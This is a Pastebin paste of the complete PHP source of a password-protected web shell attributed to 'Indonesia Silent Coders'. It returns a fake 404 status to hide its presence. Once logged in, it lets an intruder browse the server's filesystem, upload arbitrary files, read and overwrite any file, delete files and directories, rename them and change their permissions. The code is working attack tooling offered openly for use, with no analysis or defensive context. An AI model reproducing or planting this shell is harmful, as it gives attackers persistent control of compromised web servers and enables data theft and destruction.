API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 23rd, 2019
305
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.46 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. // Forbidden 404 Shell | Indonesia Silent Coders
  4. // Recorde ? Lumpuh Total + Bisu :v
  5.  
  6. error_reporting(0);
  7. header('HTTP/1.0 404 Not Found', true, 404);
  8. session_start();
  9. $pass = "makkaugeming";
  10. $link = "fvck.txt";
  11. if($_POST['password'] == $pass) {
  12. $_SESSION['forbidden'] = $pass;
  13. echo "<script>window.location='?403Forbidden'</script>";
  14. }
  15. if($_GET['page'] == "blank") {
  16. echo "<a href='?'>Back</a>";
  17. exit();
  18. }
  19. if(isset($_REQUEST['logout'])) {
  20. session_destroy();
  21. echo "<script>window.location='?403Forbidden'</script>";
  22. }
  23. if(!($_SESSION['forbidden'])) {
  24. ?>
  25. <title>404 Forbidden Shell</title>
  26. <link rel="icon" href="https://www.upload.ee/image/9815132/1554597359728-picsay.png">
  27. <style>
  28. html{
  29. overflow: auto;
  30. background: black;
  31. color: white;
  32. font-family: "Courier New";
  33. }
  34. input {
  35. background: transparent;
  36. color: white;
  37. height: 25px;
  38. border: 1px solid white;
  39. border-radius: 10px;
  40. padding: 3px;
  41. font-size: 15px;
  42. }
  43. .img {
  44. width: 150px;
  45. border: 1px solid white;
  46. border-radius: 10px;
  47. }
  48. </style>
  49. <table width="100%" height="100%">
  50. <form enctype="multipart/form-data" method="post">
  51. <td align="center">
  52. <img src="https://www.upload.ee/image/10374536/156623021-picsay.png" alt="Forbidden" width="700" height="300">
  53. <br>
  54. <input type="password" name="password" placeholder="Fucking Your Self">
  55. <input type="submit" value="LOGIN">
  56.  
  57. <h1><font class="Skranji" style="color:white;font-family:'Iceland';font-size: 15px;">Copyright &copy; 2019<font color="red"> Indonesia Silent Coders<font color="white"> | TEAM</h1>
  58. <br>
  59. <?php echo $_SESSION['forbidden']; ?>
  60. </form>
  61. </td>
  62. </table>
  63. <?php
  64. exit();
  65. }
  66. ?>
  67. <?php
  68. error_reporting(0);
  69. set_time_limit(0);
  70.  
  71. if(get_magic_quotes_gpc()){
  72. foreach($_POST as $key=>$value){
  73. $_POST[$key] = stripslashes($value);
  74. }
  75. }
  76. echo '<!DOCTYPE HTML>
  77. <html>
  78. <head>
  79. <link rel="icon" type="image/gif" href="https://www.upload.ee/image/9815132/1554597359728-picsay.png"><br>
  80. <link href="" rel="stylesheet" type="text/css">
  81. <title>403 Forbidden Shell</title>
  82. <center><img src="https://www.upload.ee/image/10374536/156623021-picsay.png" alt="Forbidden" width="600" height="230"> </center>
  83. <style>
  84. body{
  85. font-family: "Tahoma";background-image:url(https://media0.giphy.com/media/VXhUTVzvNmlRm/giphy.gif); background-size:cover; background-attachment: fixed;
  86.  
  87. color:red;
  88. }
  89. #content tr:hover{
  90. background-color: #2b282b;
  91. text-shadow:0px 0px 10px #ffffff;
  92. }
  93.  
  94. #content .first{
  95. background-color: #191919;
  96. }
  97. table{
  98. border: 1px #191919 dotted;
  99. }
  100. a{
  101. color:white;
  102. text-decoration: none;
  103. }
  104. a:hover{
  105. color:white;
  106. text-shadow:0px 0px 10px #FFFFFF;
  107. }
  108. input,select,textarea{
  109. border: 3px #FFFFFF solid;
  110. -moz-border-radius: 10px;
  111. -webkit-border-radius: 10px;
  112. border-radius: 6px;
  113. }
  114. </style>
  115. </head>
  116. <body>
  117. <table width="700" border="5" cellpadding="5" cellspacing="5" align="center">
  118. <tr><td><font color="lime">Your Path :</font> ';
  119. if(isset($_GET['path'])){
  120. $path = $_GET['path'];
  121. }else{
  122. $path = getcwd();
  123. }
  124. $path = str_replace('\\','/',$path);
  125. $paths = explode('/',$path);
  126.  
  127. foreach($paths as $id=>$pat){
  128. if($pat == '' && $id == 0){
  129. $a = true;
  130. echo '<a href="?path=/">/</a>';
  131. continue;
  132. }
  133. if($pat == '') continue;
  134. echo '<a href="?path=';
  135. for($i=0;$i<=$id;$i++){
  136. echo "$paths[$i]";
  137. if($i != $id) echo "/";
  138. }
  139. echo '">'.$pat.'</a>/';
  140. }
  141. echo '</td></tr><tr><td>';
  142. if(isset($_FILES['file'])){
  143. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  144. echo '<font color="lime">Berhasil Terupload </font><br />';
  145. }else{
  146. echo '<font color="red">Upload Gagal </font><br/>';
  147. }
  148. }
  149. echo '<form enctype="multipart/form-data" method="POST">
  150. <font color="lime">Select Your File :</font> <input type="file" name="file" />
  151. <input type="submit" value="Upload" />
  152. </form>
  153. </td></tr>';
  154. if(isset($_GET['filesrc'])){
  155. echo "<tr><td>Current File : ";
  156. echo $_GET['filesrc'];
  157. echo '</tr></td></table><br />';
  158. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  159. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  160. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  161. if($_POST['opt'] == 'chmod'){
  162. if(isset($_POST['perm'])){
  163. if(chmod($_POST['path'],$_POST['perm'])){
  164. echo '<font color="lime">Change Permission Berhasil </font><br/>';
  165. }else{
  166. echo '<font color="red">Change Permission Gagal </font><br />';
  167. }
  168. }
  169. echo '<form method="POST">
  170. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  171. <input type="hidden" name="path" value="'.$_POST['path'].'">
  172. <input type="hidden" name="opt" value="chmod">
  173. <input type="submit" value="Go" />
  174. </form>';
  175. }elseif($_POST['opt'] == 'rename'){
  176. if(isset($_POST['newname'])){
  177. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  178. echo '<font color="lime">Ganti Nama Berhasil </font><br/>';
  179. }else{
  180. echo '<font color="red">Ganti Nama Gagal </font><br />';
  181. }
  182. $_POST['name'] = $_POST['newname'];
  183. }
  184. echo '<form method="POST">
  185. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  186. <input type="hidden" name="path" value="'.$_POST['path'].'">
  187. <input type="hidden" name="opt" value="rename">
  188. <input type="submit" value="Go" />
  189. </form>';
  190. }elseif($_POST['opt'] == 'edit'){
  191. if(isset($_POST['src'])){
  192. $fp = fopen($_POST['path'],'w');
  193. if(fwrite($fp,$_POST['src'])){
  194. echo '<font color="lime">Berhasil Edit File </font><br/>';
  195. }else{
  196. echo '<font color="red">Gagal Edit File </font><br/>';
  197. }
  198. fclose($fp);
  199. }
  200. echo '<form method="POST">
  201. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  202. <input type="hidden" name="path" value="'.$_POST['path'].'">
  203. <input type="hidden" name="opt" value="edit">
  204. <input type="submit" value="Save" />
  205. </form>';
  206. }
  207. echo '</center>';
  208. }else{
  209. echo '</table><br/><center>';
  210. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  211. if($_POST['type'] == 'dir'){
  212. if(rmdir($_POST['path'])){
  213. echo '<font color="lime">Directory Terhapus</font><br/>';
  214. }else{
  215. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
  216. }
  217. }elseif($_POST['type'] == 'file'){
  218. if(unlink($_POST['path'])){
  219. echo '<font color="lime">File Terhapus</font><br/>';
  220. }else{
  221. echo '<font color="red">File Gagal Terhapus</font><br/>';
  222. }
  223. }
  224. }
  225. echo '</center>';
  226. $scandir = scandir($path);
  227. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  228. <tr class="first">
  229. <td><center>Name</peller></center></td>
  230. <td><center>Size</peller></center></td>
  231. <td><center>Permission</peller></center></td>
  232. <td><center>Modify</peller></center></td>
  233. </tr>';
  234.  
  235. foreach($scandir as $dir){
  236. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  237. echo '<tr>
  238. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  239. <td><center>--</center></td>
  240. <td><center>';
  241. if(is_writable($path.'/'.$dir)) echo '<font color="lime">';
  242. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  243. echo perms($path.'/'.$dir);
  244. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  245.  
  246. echo '</center></td>
  247. <td><center><form method="POST" action="?option&path='.$path.'">
  248. <select name="opt">
  249. <option value="">Select</option>
  250. <option value="delete">Delete</option>
  251. <option value="chmod">Chmod</option>
  252. <option value="rename">Rename</option>
  253. </select>
  254. <input type="hidden" name="type" value="dir">
  255. <input type="hidden" name="name" value="'.$dir.'">
  256. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  257. <input type="submit" value=">">
  258. </form></center></td>
  259. </tr>';
  260. }
  261. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  262. foreach($scandir as $file){
  263. if(!is_file($path.'/'.$file)) continue;
  264. $size = filesize($path.'/'.$file)/1024;
  265. $size = round($size,3);
  266. if($size >= 1024){
  267. $size = round($size/1024,2).' MB';
  268. }else{
  269. $size = $size.' KB';
  270. }
  271.  
  272. echo '<tr>
  273. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  274. <td><center>'.$size.'</center></td>
  275. <td><center>';
  276. if(is_writable($path.'/'.$file)) echo '<font color="lime">';
  277. elseif(!is_readable($path.'/'.$file)) echo '<font color="white">';
  278. echo perms($path.'/'.$file);
  279. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  280. echo '</center></td>
  281. <td><center><form method="POST" action="?option&path='.$path.'">
  282. <select name="opt">
  283. <option value="">Select</option>
  284. <option value="delete">Delete</option>
  285. <option value="chmod">Chmod</option>
  286. <option value="rename">Rename</option>
  287. <option value="edit">Edit</option>
  288. </select>
  289. <input type="hidden" name="type" value="file">
  290. <input type="hidden" name="name" value="'.$file.'">
  291. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  292. <input type="submit" value=">">
  293. </form></center></td>
  294. </tr>';
  295. }
  296. echo '</table>
  297. </div>';
  298. }
  299. echo '<font color="white" size="2px"><center><br/><b>Copyright &copy; 2019 Indonesia Silent Coders | Team <br><font color="red">Recoded By ./Asano</a></center></font>
  300.  
  301. </body>
  302. </html>
  303. ';
  304. function perms($file){
  305. $perms = fileperms($file);
  306.  
  307. if (($perms & 0xC000) == 0xC000) {
  308. // Socket
  309. $info = 's';
  310. } elseif (($perms & 0xA000) == 0xA000) {
  311. // Symbolic Link
  312. $info = 'l';
  313. } elseif (($perms & 0x8000) == 0x8000) {
  314. // Regular
  315. $info = '-';
  316. } elseif (($perms & 0x6000) == 0x6000) {
  317. // Block special
  318. $info = 'b';
  319. } elseif (($perms & 0x4000) == 0x4000) {
  320. // Directory
  321. $info = 'd';
  322. } elseif (($perms & 0x2000) == 0x2000) {
  323. // Character special
  324. $info = 'c';
  325. } elseif (($perms & 0x1000) == 0x1000) {
  326. // FIFO pipe
  327. $info = 'p';
  328. } else {
  329. // Unknown
  330. $info = 'u';
  331. }
  332.  
  333. // Owner
  334. $info .= (($perms & 0x0100) ? 'r' : '-');
  335. $info .= (($perms & 0x0080) ? 'w' : '-');
  336. $info .= (($perms & 0x0040) ?
  337. (($perms & 0x0800) ? 's' : 'x' ) :
  338. (($perms & 0x0800) ? 'S' : '-'));
  339.  
  340. // Group
  341. $info .= (($perms & 0x0020) ? 'r' : '-');
  342. $info .= (($perms & 0x0010) ? 'w' : '-');
  343. $info .= (($perms & 0x0008) ?
  344. (($perms & 0x0400) ? 's' : 'x' ) :
  345. (($perms & 0x0400) ? 'S' : '-'));
  346.  
  347. // World
  348. $info .= (($perms & 0x0004) ? 'r' : '-');
  349. $info .= (($perms & 0x0002) ? 'w' : '-');
  350. $info .= (($perms & 0x0001) ?
  351. (($perms & 0x0200) ? 't' : 'x' ) :
  352. (($perms & 0x0200) ? 'T' : '-'));
  353.  
  354. return $info;
  355. }
  356. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!